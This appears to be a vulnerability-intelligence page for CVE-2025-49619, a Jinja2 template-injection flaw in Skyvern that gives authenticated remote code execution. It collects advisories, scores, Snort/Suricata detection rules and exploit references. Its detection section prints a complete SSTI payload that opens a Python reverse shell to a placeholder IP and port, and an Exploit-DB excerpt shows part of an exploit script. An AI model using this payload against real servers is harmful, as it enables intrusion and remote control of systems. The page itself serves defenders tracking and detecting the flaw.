CVE-2025-49619
published 2025-06-07CVE-2025-49619: Skyvern through 0.1.85 is vulnerable to server-side template injection (SSTI) in the Prompt field of workflow blocks such as the Navigation v2 Block. Improper…
PriorityP182high8.5CVSS 3.1
AVNACLPRLUINSCCHILAN
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
13.75%
96.0th percentile
Skyvern through 0.1.85 is vulnerable to server-side template injection (SSTI) in the Prompt field of workflow blocks such as the Navigation v2 Block. Improper sanitization of Jinja2 template input allows authenticated users to inject crafted expressions that are evaluated on the server, leading to blind remote code execution (RCE).
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| skyvern | skyvern | <= 0.1.85 | — |
| skyvern | skyvern | 0 – 0.2.0 | — |
Detection & IOCsextracted from sources · hover to see the quote
url/api/v1/workflows
command{% for x in ().__class__.__base__.__subclasses__() %}
{% if 'warning' in x.__name__ %}
{{ x()._module.__builtins__['__import__']('os').popen(
"python3 -c 'import socket,os,pty;"
"s=socket.socket();"
"s.connect((\"<ip>\",<port>));"
"os.dup2(s.fileno(),0);"
"os.dup2(s.fileno(),1);"
"os.dup2(s.fileno(),2);"
"pty.spawn(\"sh\")'"
).read() }}
{% endif %}
{% endfor %}↗
snort
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Skyvern Authenticated SSTI Remote Code Execution (CVE-2025-49619)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/api/v1/workflows"; fast_pattern; http.request_body; content:"prompt"; content:"|7b|"; distance:0; pcre:"/((?<=(?:\x7b|\x24|\x23|\x7e|\x40|\x2a|\x25|\x5f))\x7b|\x7b(?:\x25|\x23|\x2f))[\x20-\x7e]+/"; reference:url,attackerkb.com/topics/4Hq1jtfYEq/cve-2025-49619; reference:cve,2025-49619; classtype:web-application-attack; sid:2064150; rev:1; metadata:attack_target Server, tls_state TLSDecrypt, created_at 2025_08_25, cve CVE_2025_49619, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2025_08_25, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
- →Detect POST requests to /api/v1/workflows containing a 'prompt' field with Jinja2 template injection characters (e.g., `{{`, `{%`, `{#`) — the Snort rule uses pcre to match template delimiters preceded by special chars like `{`, `$`, `#`, `~`, `@`, `*`, `%`, `_`.
- →The exploit workflow uses block_type 'task_v2' with a crafted 'prompt' field containing Jinja2 SSTI payload targeting Python's `__subclasses__()` chain to reach `os.popen()` for RCE. Monitor workflow creation API calls for these patterns. ↗
- →The exploit requires an authenticated API key passed via the `X-API-Key` header. Anomalous workflow creation (POST /api/v1/workflows) followed immediately by execution (POST /api/v1/workflows/{id}/run) from the same API key is a strong behavioral indicator. ↗
- →TLS decryption is required for effective detection per the Snort rule metadata (`tls_state TLSDecrypt`). Ensure inspection is performed on decrypted traffic at the perimeter and internally.
- ·The vulnerability affects Skyvern versions through 0.1.85 (Metasploit module targets <=0.1.84). Exploitation requires a valid API key — this is an authenticated vulnerability, not unauthenticated RCE. ↗
- ·The injection point is specifically the 'Prompt' field of workflow blocks such as the Navigation v2 Block and task_v2 block type. Other block types may also be affected if they process Jinja2 templates. ↗
CVSS provenance
nvdv3.18.5HIGHCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N
vulncheck8.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
Skyvern has a Jinja runtime leak
osv·2025-06-07
CVE-2025-49619 [HIGH] Skyvern has a Jinja runtime leak
Skyvern has a Jinja runtime leak
Skyvern through 0.2.0 has a Jinja runtime leak in sdk/workflow/models/block.py.
GHSA
Skyvern has a Jinja runtime leak
ghsa·2025-06-07
CVE-2025-49619 [HIGH] CWE-1336 Skyvern has a Jinja runtime leak
Skyvern has a Jinja runtime leak
Skyvern through 0.2.0 has a Jinja runtime leak in sdk/workflow/models/block.py.
VulnCheck
Improper Neutralization of Special Elements Used in a Template Engine
vulncheck·2025·CVSS 8.5
CVE-2025-49619 [HIGH] Improper Neutralization of Special Elements Used in a Template Engine
Improper Neutralization of Special Elements Used in a Template Engine
Skyvern through 0.1.85 is vulnerable to server-side template injection (SSTI) in the Prompt field of workflow blocks such as the Navigation v2 Block. Improper sanitization of Jinja2 template input allows authenticated users to inject crafted expressions that are evaluated on the server, leading to blind remote code execution (RCE).
Affected: Skyvern Skyvern
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://app.crowdsec.net/cti/cve-explorer/CVE-2025-49619
Exploit PoC: https://vulncheck.com/xdb/3f7a05965f9e
Suricata
ET WEB_SPECIFIC_APPS Skyvern Authenticated SSTI Remote Code Execution (CVE-2025-49619)
suricata·2025-08-25·CVSS 8.5
CVE-2025-49619 [HIGH] ET WEB_SPECIFIC_APPS Skyvern Authenticated SSTI Remote Code Execution (CVE-2025-49619)
ET WEB_SPECIFIC_APPS Skyvern Authenticated SSTI Remote Code Execution (CVE-2025-49619)
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Skyvern Authenticated SSTI Remote Code Execution (CVE-2025-49619)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/api/v1/workflows"; fast_pattern; http.request_body; content:"prompt"; content:"|7b|"; distance:0; pcre:"/((?<=(?:\x7b|\x24|\x23|\x7e|\x40|\x2a|\x25|\x5f))\x7b|\x7b(?:\x25|\x23|\x2f))[\x20-\x7e]+/"; reference:url,attackerkb.com/topics/4Hq1jtfYEq/cve-2025-49619; reference:cve,2025-49619; classtype:web-application-attack; sid:2064150; rev:1; metadata:attack_target Server, tls_state TLSDecrypt, created_at 2025_08_25, cve CVE_2025_49619, deployment Perimeter, deployment Internal, confidence High, s
Exploit-DB
Skyvern 0.1.85 - Remote Code Execution (RCE) via SSTI
exploitdb·2025-06-15·CVSS 8.5
CVE-2025-49619 [HIGH] Skyvern 0.1.85 - Remote Code Execution (RCE) via SSTI
Skyvern 0.1.85 - Remote Code Execution (RCE) via SSTI
---
# Exploit Title: Skyvern 0.1.85 - Remote Code Execution (RCE) via SSTI
# Date: 2025-06-15
# Exploit Author: Cristian Branet
# Vendor Homepage: https://www.skyvern.com/
# Software Link: https://github.com/Skyvern-AI/skyvern
# Version: Settings -> API Key -> Reveal and copy the API key")
parser.add_argument("-i", "--ip", required=True, help="IP address to receive the reverse shell connection")
parser.add_argument("-p", "--port", required=True, help="Port for the reverse shell connection")
def create_exploit_workflow(url, ip, port, x_api_key):
exploit_workflow = {
"title": "Exploit",
"description": "",
"proxy_location": "RESIDENTIAL",
"webhook_callback_url": "",
"persist_browser_session": False,
"model": None,
"totp_verification_url
Metasploit
Skyvern SSTI Remote Code Execution
metasploit
Skyvern SSTI Remote Code Execution
Skyvern SSTI Remote Code Execution
This module exploits SSTI vulnerability in Skyvern<=0.1.84. The module requires API key to deliver requests and upload malicious workflow.
No writeups or analysis indexed.
2025-06-07
Published
Exploited in the wild